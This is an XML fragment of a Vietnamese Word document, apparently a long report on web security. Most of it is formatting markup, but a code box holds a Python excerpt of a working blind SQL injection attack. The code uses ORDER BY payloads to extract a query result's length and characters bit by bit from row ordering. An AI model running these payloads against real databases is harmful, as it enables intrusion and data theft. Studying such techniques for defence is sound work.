            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>5:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Nguyen Tien E',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>6:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Vo Thanh F',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>7:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Le Tien G',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>8:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Tran Van H',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>9:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Pham Thuy K',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pP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payload </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>= "order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select length(({0}))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.resultLength = (self.getQueryResult(payload))</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payload =</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select ascii(substring(({0}),{1},1))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query, i+1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>tmp = (self.getQueryResult(payload))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def getQueryResult(self, payload):</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 xml:space="preserve">resultText </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>r.text</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>pos1 = resultText.find(self.standard_dict[1])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>post_dict = {}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>for i in range(2,10):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>pos = resultText.find(self.standard_dict[i])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if pos &lt; pos1:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>#Before 1 ==&gt; -@hbn ==&gt; 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>post_dict[i] = 0</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post_dict[i] = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>s = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>for i in range(9,1,-1):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>x = pow(2,i-2) * post_dict[i]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>s = s+x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return (s)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">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p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidSect="004C4D4F">
      <w:footerReference w:type="default" r:id="rId71"/>
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1701" w:right="1134" w:bottom="1701" w:left="1701" w:header="0" w:footer="720" w:gutter="0"/>
      <w:cols w:space="720"/>
      <w:formProt w:val="0"/>
      <w:docGrid w:linePitch="360"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C7D" w:rsidRDefault="00357C7D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00357C7D" w:rsidRDefault="00357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Malgun Gothic Semilight"/>
    <w:charset w:val="80"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="2BDFFCFB" w:usb2="00000036" w:usb3="00000000" w:csb0="003F01FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Sans">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433B" w:rsidRDefault="00EF433B">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Trang </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A13901">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>12</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t>/</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A13901">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>96</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00EF433B" w:rsidRDefault="00EF4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C7D" w:rsidRDefault="00357C7D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00357C7D" w:rsidRDefault="00357C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56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141DF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FB67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375F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2604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1121ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="943EA5B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2B9B24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B911A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BD02F2A"/>
    <w:lvl w:ilvl="0" w:tplc="A3B01D4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54217"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63E24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1665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44E5B68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F066F8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3E8252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B15360"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCD6C88A"/>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EEC0AEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F348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BE3884"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDC49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3F66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B83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A63D56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EC85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9F61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867217"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55946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0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="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9"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="5"/>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4667B"/>
    <w:rsid w:val="000002DA"/>
    <w:rsid w:val="000018BD"/>
    <w:rsid w:val="00004A70"/>
    <w:rsid w:val="0002676F"/>
    <w:rsid w:val="00060E03"/>
    <w:rsid w:val="000679B7"/>
    <w:rsid w:val="0007360D"/>
    <w:rsid w:val="00074812"/>
    <w:rsid w:val="00075263"/>
    <w:rsid w:val="0008594E"/>
    <w:rsid w:val="00090566"/>
    <w:rsid w:val="00091C83"/>
    <w:rsid w:val="0009792B"/>
    <w:rsid w:val="000A2289"/>
    <w:rsid w:val="000A3157"/>
    <w:rsid w:val="000A4959"/>
    <w:rsid w:val="000B0F4B"/>
    <w:rsid w:val="000B5547"/>
    <w:rsid w:val="000B5CFF"/>
    <w:rsid w:val="000C4895"/>
    <w:rsid w:val="000C73CB"/>
    <w:rsid w:val="000F3A0F"/>
    <w:rsid w:val="000F595C"/>
    <w:rsid w:val="001067FE"/>
    <w:rsid w:val="001140CD"/>
    <w:rsid w:val="00126AF3"/>
    <w:rsid w:val="001359BE"/>
    <w:rsid w:val="00141CBB"/>
    <w:rsid w:val="00144329"/>
    <w:rsid w:val="00161298"/>
    <w:rsid w:val="0016449D"/>
    <w:rsid w:val="00166079"/>
    <w:rsid w:val="00185184"/>
    <w:rsid w:val="00187A14"/>
    <w:rsid w:val="00195EED"/>
    <w:rsid w:val="001A4F73"/>
    <w:rsid w:val="001A6BDC"/>
    <w:rsid w:val="001B004F"/>
    <w:rsid w:val="001B68FE"/>
    <w:rsid w:val="001C1682"/>
    <w:rsid w:val="001C221C"/>
    <w:rsid w:val="001C48BA"/>
    <w:rsid w:val="001D22C4"/>
    <w:rsid w:val="001D665C"/>
    <w:rsid w:val="001E45E1"/>
    <w:rsid w:val="001F366C"/>
    <w:rsid w:val="001F7160"/>
    <w:rsid w:val="001F7343"/>
    <w:rsid w:val="00203635"/>
    <w:rsid w:val="00227CCB"/>
    <w:rsid w:val="0025031B"/>
    <w:rsid w:val="00254900"/>
    <w:rsid w:val="00254DE4"/>
    <w:rsid w:val="00261C96"/>
    <w:rsid w:val="00273A9E"/>
    <w:rsid w:val="002906A4"/>
    <w:rsid w:val="002A14DE"/>
    <w:rsid w:val="002A53D9"/>
    <w:rsid w:val="002B02EF"/>
    <w:rsid w:val="002B0849"/>
    <w:rsid w:val="002C12C7"/>
    <w:rsid w:val="002C2C35"/>
    <w:rsid w:val="002C773D"/>
    <w:rsid w:val="002D3C6B"/>
    <w:rsid w:val="002D42D8"/>
    <w:rsid w:val="002D681D"/>
    <w:rsid w:val="002E332A"/>
    <w:rsid w:val="002E37B1"/>
    <w:rsid w:val="002E5E1B"/>
    <w:rsid w:val="002F2131"/>
    <w:rsid w:val="002F53E1"/>
    <w:rsid w:val="003006E8"/>
    <w:rsid w:val="00300F28"/>
    <w:rsid w:val="0030524E"/>
    <w:rsid w:val="00305840"/>
    <w:rsid w:val="00305F5A"/>
    <w:rsid w:val="00307A9D"/>
    <w:rsid w:val="00320504"/>
    <w:rsid w:val="00323CAC"/>
    <w:rsid w:val="00325E74"/>
    <w:rsid w:val="003263E0"/>
    <w:rsid w:val="003308DA"/>
    <w:rsid w:val="003406A0"/>
    <w:rsid w:val="0034368E"/>
    <w:rsid w:val="003451D0"/>
    <w:rsid w:val="0034667B"/>
    <w:rsid w:val="00346AC0"/>
    <w:rsid w:val="00350793"/>
    <w:rsid w:val="00355955"/>
    <w:rsid w:val="00357C7D"/>
    <w:rsid w:val="00366A23"/>
    <w:rsid w:val="003910E7"/>
    <w:rsid w:val="00391D73"/>
    <w:rsid w:val="00392353"/>
    <w:rsid w:val="003A14BC"/>
    <w:rsid w:val="003A1ADF"/>
    <w:rsid w:val="003A3F0E"/>
    <w:rsid w:val="003A6E53"/>
    <w:rsid w:val="003B1940"/>
    <w:rsid w:val="003B4696"/>
    <w:rsid w:val="003B5F5D"/>
    <w:rsid w:val="003B615C"/>
    <w:rsid w:val="003B6416"/>
    <w:rsid w:val="003B7403"/>
    <w:rsid w:val="003B78B9"/>
    <w:rsid w:val="003C6691"/>
    <w:rsid w:val="003C748B"/>
    <w:rsid w:val="003D0410"/>
    <w:rsid w:val="003D3A27"/>
    <w:rsid w:val="003E0ED1"/>
    <w:rsid w:val="003E1679"/>
    <w:rsid w:val="003E2412"/>
    <w:rsid w:val="003E593C"/>
    <w:rsid w:val="003E7AA8"/>
    <w:rsid w:val="003F2ACD"/>
    <w:rsid w:val="003F7098"/>
    <w:rsid w:val="004046D2"/>
    <w:rsid w:val="00404F02"/>
    <w:rsid w:val="004064FA"/>
    <w:rsid w:val="00410F30"/>
    <w:rsid w:val="00412534"/>
    <w:rsid w:val="00416450"/>
    <w:rsid w:val="004415A7"/>
    <w:rsid w:val="00446F93"/>
    <w:rsid w:val="00455D2B"/>
    <w:rsid w:val="004571CD"/>
    <w:rsid w:val="004601D9"/>
    <w:rsid w:val="00470368"/>
    <w:rsid w:val="00476C6C"/>
    <w:rsid w:val="004A2A62"/>
    <w:rsid w:val="004B4347"/>
    <w:rsid w:val="004C204C"/>
    <w:rsid w:val="004C4D20"/>
    <w:rsid w:val="004C4D4F"/>
    <w:rsid w:val="004D1E53"/>
    <w:rsid w:val="004D72F3"/>
    <w:rsid w:val="004E7ED7"/>
    <w:rsid w:val="004F36FB"/>
    <w:rsid w:val="004F5035"/>
    <w:rsid w:val="004F69FA"/>
    <w:rsid w:val="005010FD"/>
    <w:rsid w:val="00501C5D"/>
    <w:rsid w:val="00511280"/>
    <w:rsid w:val="00520B88"/>
    <w:rsid w:val="00521EC1"/>
    <w:rsid w:val="00536779"/>
    <w:rsid w:val="00536EBF"/>
    <w:rsid w:val="00541FE4"/>
    <w:rsid w:val="0055027C"/>
    <w:rsid w:val="00550B65"/>
    <w:rsid w:val="00555378"/>
    <w:rsid w:val="00555D31"/>
    <w:rsid w:val="00562C45"/>
    <w:rsid w:val="00562F29"/>
    <w:rsid w:val="00565584"/>
    <w:rsid w:val="00566767"/>
    <w:rsid w:val="00570A7A"/>
    <w:rsid w:val="00571796"/>
    <w:rsid w:val="0058383C"/>
    <w:rsid w:val="00586AE9"/>
    <w:rsid w:val="00587B19"/>
    <w:rsid w:val="00592B4D"/>
    <w:rsid w:val="005A151D"/>
    <w:rsid w:val="005A6327"/>
    <w:rsid w:val="005B031B"/>
    <w:rsid w:val="005B135A"/>
    <w:rsid w:val="005B29B5"/>
    <w:rsid w:val="005B4A41"/>
    <w:rsid w:val="005B6AC4"/>
    <w:rsid w:val="005D256F"/>
    <w:rsid w:val="005D3C52"/>
    <w:rsid w:val="005E495B"/>
    <w:rsid w:val="005E4E83"/>
    <w:rsid w:val="005E7228"/>
    <w:rsid w:val="005F0F2A"/>
    <w:rsid w:val="005F3F37"/>
    <w:rsid w:val="005F7946"/>
    <w:rsid w:val="00603AE9"/>
    <w:rsid w:val="0060415D"/>
    <w:rsid w:val="00610D75"/>
    <w:rsid w:val="00612934"/>
    <w:rsid w:val="00614D66"/>
    <w:rsid w:val="00617466"/>
    <w:rsid w:val="00621DB2"/>
    <w:rsid w:val="00642451"/>
    <w:rsid w:val="00643484"/>
    <w:rsid w:val="00650956"/>
    <w:rsid w:val="00653863"/>
    <w:rsid w:val="00656FC6"/>
    <w:rsid w:val="00662FE1"/>
    <w:rsid w:val="006674E2"/>
    <w:rsid w:val="00673CE2"/>
    <w:rsid w:val="006957A4"/>
    <w:rsid w:val="006A00C0"/>
    <w:rsid w:val="006A3400"/>
    <w:rsid w:val="006A67F5"/>
    <w:rsid w:val="006A79EF"/>
    <w:rsid w:val="006B1F99"/>
    <w:rsid w:val="006B2163"/>
    <w:rsid w:val="006C1938"/>
    <w:rsid w:val="006C3FBD"/>
    <w:rsid w:val="006D6505"/>
    <w:rsid w:val="006D6FC6"/>
    <w:rsid w:val="006E25A7"/>
    <w:rsid w:val="00724DBD"/>
    <w:rsid w:val="0073015D"/>
    <w:rsid w:val="00731E3A"/>
    <w:rsid w:val="00735E19"/>
    <w:rsid w:val="00736345"/>
    <w:rsid w:val="00754364"/>
    <w:rsid w:val="00756590"/>
    <w:rsid w:val="00757273"/>
    <w:rsid w:val="00760373"/>
    <w:rsid w:val="00765278"/>
    <w:rsid w:val="007700D0"/>
    <w:rsid w:val="00781B18"/>
    <w:rsid w:val="007874C9"/>
    <w:rsid w:val="00797E7B"/>
    <w:rsid w:val="007A47EB"/>
    <w:rsid w:val="007B258A"/>
    <w:rsid w:val="007D081B"/>
    <w:rsid w:val="007D72F3"/>
    <w:rsid w:val="007F0DDD"/>
    <w:rsid w:val="007F0E35"/>
    <w:rsid w:val="007F31C4"/>
    <w:rsid w:val="007F4307"/>
    <w:rsid w:val="007F758F"/>
    <w:rsid w:val="00800AAF"/>
    <w:rsid w:val="00804310"/>
    <w:rsid w:val="0080610C"/>
    <w:rsid w:val="00815231"/>
    <w:rsid w:val="00835F18"/>
    <w:rsid w:val="00840304"/>
    <w:rsid w:val="00843C00"/>
    <w:rsid w:val="00851221"/>
    <w:rsid w:val="008673FF"/>
    <w:rsid w:val="008724FC"/>
    <w:rsid w:val="00872F45"/>
    <w:rsid w:val="00873D9D"/>
    <w:rsid w:val="00876FFE"/>
    <w:rsid w:val="00891990"/>
    <w:rsid w:val="008B3D7D"/>
    <w:rsid w:val="008C1C90"/>
    <w:rsid w:val="008C75CB"/>
    <w:rsid w:val="008E3B8D"/>
    <w:rsid w:val="008E4486"/>
    <w:rsid w:val="008F0721"/>
    <w:rsid w:val="008F573F"/>
    <w:rsid w:val="008F7562"/>
    <w:rsid w:val="0090349F"/>
    <w:rsid w:val="009147F6"/>
    <w:rsid w:val="009201E8"/>
    <w:rsid w:val="00922FC1"/>
    <w:rsid w:val="009313E1"/>
    <w:rsid w:val="00934855"/>
    <w:rsid w:val="00937B10"/>
    <w:rsid w:val="0094116B"/>
    <w:rsid w:val="00942DF4"/>
    <w:rsid w:val="00947D85"/>
    <w:rsid w:val="00954BB3"/>
    <w:rsid w:val="00962CE7"/>
    <w:rsid w:val="0097206B"/>
